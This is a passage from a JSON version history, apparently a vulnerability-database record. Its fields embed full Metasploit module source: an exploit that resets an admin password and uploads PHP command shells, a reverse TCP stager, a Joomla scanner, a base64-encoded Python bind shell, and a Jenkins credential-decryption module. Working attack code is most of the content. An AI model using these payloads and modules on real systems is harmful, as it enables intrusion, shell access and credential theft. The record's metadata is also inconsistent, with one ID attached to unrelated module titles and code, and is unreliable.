'.php'\n resetscript\t= rand_text_alphanumeric(20) + '.php'\n newuser \t= rand_text_alphanumeric(6)\n newpass \t= rand_text_alphanumeric(6)\n\n # Static files\n directory \t= '/images/'\n cmdpath \t= directory + cmdscript\n resetpath \t= directory + resetscript\n passwdfile \t= '/config/password.txt'\n\n # Let's do this thing\n hash = retrieve_password_hash(passwdfile)\n delete_file(passwdfile)\n create_new_password(newuser, newpass)\n session = retrieve_session(newuser, newpass)\n upload_page(session, directory, resetscript, reset_php)\n upload_page(session, directory, cmdscript, cmd_php)\n reset_original_password(hash, resetpath)\n delete_file(resetpath)\n cmd_shell(cmdpath)\n delete_file(cmdpath)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T10:42:29", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 8}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-27T13:07:09", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2019-06-27T13:07:09"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:DB224D758C82529E1585E5EF1DB1FDB1"]}, {"type": "thn", "idList": ["THN:D6117E821CC35301CBF666F41C14AC0E", "THN:FBAD9A20903607562F942FCDD6D93183"]}, {"type": "hackread", "idList": ["HACKREAD:D224FE188FB518B4BC3EABF51C58D965"]}, {"type": "threatpost", "idList": ["THREATPOST:72236319BAB4F01C9BE8DD2459ED5F94"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107027", "OPENVAS:1361412562310142507", "OPENVAS:1361412562310142509"]}, {"type": "zdt", "idList": ["1337DAY-ID-32902", "1337DAY-ID-32903", "1337DAY-ID-32910", "1337DAY-ID-32898", "1337DAY-ID-32907", "1337DAY-ID-32909"]}, {"type": "mssecure", "idList": ["MSSECURE:CDA73C194141860C4C4FE0E32FB8E2B7"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:E21433CF86603167D28FD5F315ECFFA9"]}, {"type": "krebs", "idList": ["KREBS:07C73B5E86596D99F557E157FDD0843E"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:16836CACCD5C61030C97BFF27CA03E24"]}, {"type": "kitploit", "idList": ["KITPLOIT:918962306885733667"]}, {"type": "securelist", "idList": ["SECURELIST:B8D488526216D8E2E4D0711DA61A5D8E"]}], "modified": "2019-06-27T13:07:09"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T13:07:09", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 9}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "fa1a2bf94beb5720923c4675535d92b4", "type": "metasploit", "bulletinFamily": "exploit", "title": "Joomla Page Scanner", "description": "This module scans a Joomla install for common pages.\n", "published": "2013-01-25T19:44:49", "modified": "2018-07-31T16:37:10", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-11T16:33:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2019-07-11T16:33:28"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", "CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105", "EDB-ID:47100", "EDB-ID:47091", "EDB-ID:47095", "EDB-ID:47093", "EDB-ID:47099"]}, {"type": "kitploit", "idList": ["KITPLOIT:5782004382058810681"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814989", "OPENVAS:1361412562310814984", "OPENVAS:1361412562310815516", "OPENVAS:1361412562310815501", "OPENVAS:1361412562310815514", "OPENVAS:1361412562310815232", "OPENVAS:1361412562310815153", "OPENVAS:1361412562310815504", "OPENVAS:1361412562310815152"]}], "modified": "2019-07-11T16:33:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/joomla_pages.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to\n # Joomscan and various MSF modules for code examples.\n def initialize\n super(\n 'Name' => 'Joomla Page Scanner',\n 'Description' => %q{\n This module scans a Joomla install for common pages.\n },\n 'Author' => [ 'newpid0' ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The path to the Joomla install\", '/'])\n ])\n end\n\n def run_host(ip)\n tpath = normalize_uri(target_uri.path)\n if tpath[-1,1] != '/'\n tpath += '/'\n end\n\n pages = [\n 'robots.txt',\n 'administrator/index.php',\n 'admin/',\n 'index.php/using-joomla/extensions/components/users-component/registration-form',\n 'index.php/component/users/?view=registration',\n 'htaccess.txt'\n ]\n\n vprint_status(\"Checking for interesting pages\")\n pages.each do |page|\n scan_pages(tpath, page, ip)\n end\n\n end\n\n def scan_pages(tpath, page, ip)\n res = send_request_cgi({\n 'uri' => \"#{tpath}#{page}\",\n 'method' => 'GET',\n })\n return if not res or not res.body or not res.code\n res.body.gsub!(/[\\r|\\n]/, ' ')\n\n if (res.code == 200)\n note = \"Page Found\"\n if (res.body =~ /Administration Login/ and res.body =~ /\\(\\'form-login\\'\\)\\.submit/ or res.body =~/administration console/)\n note = \"Administrator Login Page\"\n elsif (res.body =~/Registration/ and res.body =~/class=\"validate\">Register<\\/button>/)\n note = \"Registration Page\"\n end\n\n msg = \"#{note}: #{tpath}#{page}\"\n print_good(\"#{peer} - #{msg}\")\n\n report_note(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :sname => 'http',\n :ntype => 'joomla_page',\n :data => msg,\n :update => :unique_data\n )\n elsif (res.code == 403)\n if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)\n vprint_status(\"#{peer} - denied access to #{ip} (SSL Required)\")\n elsif (res.body =~ /has a list of IP addresses that are not allowed/)\n vprint_status(\"#{peer} - restricted access by IP\")\n elsif (res.body =~ /SSL client certificate is required/)\n vprint_status(\"#{peer} - requires a SSL client certificate\")\n else\n vprint_status(\"#{peer} - ip access to #{ip} #{res.code} #{res.message}\")\n end\n end\n\n return\n\n rescue OpenSSL::SSL::SSLError\n vprint_error(\"SSL error\")\n return\n rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError\n vprint_error(\"Unable to Connect\")\n return\n rescue ::Timeout::Error, ::Errno::EPIPE\n vprint_error(\"Timeout error\")\n return\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-11T16:33:28", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 10}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-11T18:28:36", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-07-11T18:28:36"}, "dependencies": {"references": [{"type": "mssecure", "idList": ["MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", "CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB37BD3B89808BC17131C9FD653372A8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105", "EDB-ID:47099", "EDB-ID:47091", "EDB-ID:47095", "EDB-ID:47100"]}, {"type": "kitploit", "idList": ["KITPLOIT:5782004382058810681"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815232", "OPENVAS:1361412562310815504", "OPENVAS:1361412562310814984", "OPENVAS:1361412562310814989", "OPENVAS:1361412562310815233", "OPENVAS:1361412562310815507", "OPENVAS:1361412562310815516", "OPENVAS:1361412562310815155"]}], "modified": "2019-07-11T18:28:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-11T18:28:36", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 11}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "0cc32500cfadad1807eaf90b527de9c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "Command Shell, Bind TCP (via python)", "description": "Creates an interactive shell via python, encodes with base64 by design\n", "published": "2017-10-23T14:20:19", "modified": "2017-10-24T04:04:02", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-23T23:00:59", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2019-07-23T23:00:59"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", "idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153697", "PACKETSTORM:153698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815255", "OPENVAS:1361412562310815253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}], "modified": "2019-07-23T23:00:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/python/shell_bind_tcp.rb", "sourceData": "require 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/python'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 381\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Command Shell, Bind TCP (via python)',\n 'Description' => 'Creates an interactive shell via python, encodes with base64 by design',\n 'Author' => 'mumbai',\n 'License' => MSF_LICENSE,\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'python',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n def generate\n super + command_string\n end\n\n def command_string\n cmd = ''\n dead = Rex::Text.rand_text_alpha(2)\n # Set up the socket\n cmd << \"import socket,os\\n\"\n cmd << \"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\n\"\n cmd << \"so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\\n\"\n cmd << \"so.listen(1)\\n\"\n cmd << \"so,addr=so.accept()\\n\"\n cmd << \"#{dead}=False\\n\"\n cmd << \"while not #{dead}:\\n\"\n cmd << \"\\tdata=so.recv(1024)\\n\"\n cmd << \"\\tstdin,stdout,stderr,=os.popen3(data)\\n\"\n cmd << \"\\tstdout_value=stdout.read()+stderr.read()\\n\"\n cmd << \"\\tso.send(stdout_value)\\n\"\n\n # base64\n cmd = \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\"\n cmd\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T23:00:59", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 12}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-24T01:21:05", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.3, "vector": "NONE", "modified": "2019-07-24T01:21:05"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", "idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153697", "PACKETSTORM:153698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815253", "OPENVAS:1361412562310815255"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}], "modified": "2019-07-24T01:21:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-24T01:21:05", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 13}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "02c8ac769ae0c3050049db8e0ffdbd7f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Jenkins Domain Credential Recovery", "description": "This module will collect Jenkins domain credentials, and uses the script console to decrypt each password if anonymous permission is allowed. It has been tested against Jenkins version 1.590, 1.633, and 1.638.\n", "published": "2015-11-23T22:23:59", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html"], "cvelist": [], "lastseen": "2019-07-25T07:15:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.7, "vector": "NONE", "modified": "2019-07-25T07:15:03"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187", "KITPLOIT:6387497839583318095"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "cve", "idList": ["CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702", "CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}], "modified": "2019-07-25T07:15:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/jenkins_cred_recovery.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'json'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins Domain Credential Recovery',\n 'Description' => %q{\n This module will collect Jenkins domain credentials, and uses\n the script console to decrypt each password if anonymous permission\n is allowed.\n\n It has been tested against Jenkins version 1.590, 1.633, and 1.638.\n },\n 'Author' =>\n [\n 'Th3R3p0', # Vuln Discovery, PoC\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'EDB', '38664' ],\n [ 'URL', 'http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8080\n },\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),\n OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])\n ])\n end\n\n\n # Returns the Jenkins version.\n #\n # @return [String] Jenkins version.\n # @return [NilClass] No Jenkins version found.\n def get_jenkins_version\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({ 'uri' => uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')\n end\n\n html = res.get_html_document\n version_attribute = html.at('body').attributes['data-version']\n version = version_attribute ? version_attribute.value : ''\n version.scan(/jenkins\\-([\\d\\.]+)/).flatten.first\n end\n\n\n # Returns the Jenkins domain configured by the user.\n #\n # @return [String]\n def domain\n datastore['JENKINSDOMAIN']\n end\n\n\n # Returns a check code indicating the vulnerable status.\n #\n # @return [Array] Check code\n def check\n version = get_jenkins_version\n vprint_status(\"Found version: #{version}\")\n\n # Default version is vulnerable, but can be mitigated by refusing anonymous permission on\n # decryption API. So a version wouldn't be adequate to check.\n if version\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n # Returns all the found Jenkins accounts of a specific domain. The accounts collected only\n # include the ones with the username-and-password kind. It does not include other kinds such\n # as SSH, certificates, or other plugins.\n #\n # @return [Array<Hash>] An array of account data such as id, username, kind, description, and\n # the domain it belongs to.\n def get_users\n users = []\n\n uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)\n uri << '/'\n\n res = send_request_cgi({ 'uri'=>uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')\n end\n\n html = res.get_html_document\n rows = html.search('//table[@class=\"sortable pane bigtable\"]//tr')\n\n # The first row is the table header, which we don't want.\n rows.shift\n\n rows.each do |row|\n td = row.search('td')\n id = td[0].at('a').attributes['href'].value.scan(/^credential\\/(.+)/).flatten.first || ''\n name = td[1].text.scan(/^(.+)\\/\\*+/).flatten.first || ''\n kind = td[2].text\n desc = td[3].text\n next unless /Username with password/i === kind\n\n users << {\n id: id,\n username: name,\n kind: kind,\n description: desc,\n domain: domain\n }\n end\n\n users\n end\n\n\n # Returns the found encrypted password from the update page.\n #\n # @param id [String] The ID of a specific account.\n #\n # @return [String] Found encrypted password.\n # @return [NilCass] No encrypted password found.\n def get_encrypted_password(id)\n uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')\n res = send_request_cgi({ 'uri'=>uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')\n end\n\n html = res.get_html_document\n input = html.at('//div[@id=\"main-panel\"]//form//table//tr/td//input[@name=\"_.password\"]')\n\n if input\n return input.attributes['value'].value\n else\n vprint_error(\"Unable to find encrypted password for #{id}\")\n end\n\n nil\n end\n\n\n # Returns the decrypted password by using the script console.\n #\n # @param encrypted_pass [String] The encrypted password.\n #\n # @return [String] The decrypted password.\n # @return [NilClass] No decrypted password found (no result found on the console)\n def decrypt(encrypted_pass)\n uri = normalize_uri(target_uri, 'script')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' => {\n 'script' => \"hudson.util.Secret.decrypt '#{encrypted_pass}'\",\n 'json' => {'script' => \"hudson.util.Secret.decrypt '#{encrypted_pass}'\"}.to_json,\n 'Submit' => 'Run'\n }\n })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while accessing the script console')\n end\n\n if /javax\\.servlet\\.ServletException: hudson\\.security\\.AccessDeniedException2/ === res.body\n vprint_error('No permission to decrypt password')\n return nil\n end\n\n html = res.get_html_document\n result = html.at('//div[@id=\"main-panel\"]//pre[contains(text(), \"Result:\")]')\n if result\n decrypted_password = result.inner_text.scan(/^Result: ([[:print:]]+)/).flatten.first\n return decrypted_password\n else\n vprint_error('Unable to find result')\n end\n\n nil\n end\n\n\n # Decrypts an encrypted password for a given ID.\n #\n # @param id [String] Account ID.\n #\n # @return [String] The decrypted password.\n # @return [NilClass] No decrypted password found (no result found on the console)\n def descrypt_password(id)\n encrypted_pass = get_encrypted_password(id)\n decrypt(encrypted_pass)\n end\n\n\n # Reports the username and password to database.\n #\n # @param opts [Hash]\n # @option opts [String] :user\n # @option opts [String] :password\n # @option opts [String] :proof\n #\n # @return [void]\n def report_cred(opts)\n service_data = {\n address: rhost,\n port: rport,\n service_name: ssl ? 'https' : 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user]\n }.merge(service_data)\n\n if opts[:password]\n credential_data.merge!(\n private_data: opts[:password],\n private_type: :password\n )\n end\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n def run\n users = get_users\n print_status(\"Found users for domain #{domain}: #{users.length}\")\n\n users.each do |user_data|\n pass = descrypt_password(user_data[:id])\n if pass\n if user_data[:description].blank?\n print_good(\"Found credential: #{user_data[:username]}:#{pass}\")\n else\n print_good(\"Found credential: #{user_data[:username]}:#{pass} (#{user_data[:description]})\")\n end\n else\n print_status(\"Found #{user_data[:username]}, but unable to decrypt password.\")\n end\n\n report_cred(\n user: user_data[:username],\n password: pass,\n proof: user_data.inspect\n )\n end\n end\n\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n\n def print_good(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T07:15:03", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 14}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T08:29:47", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-07-25T08:29:47"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "cve", "idList": ["CVE-2019-3622", "CVE-2019-3591", "CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142659", 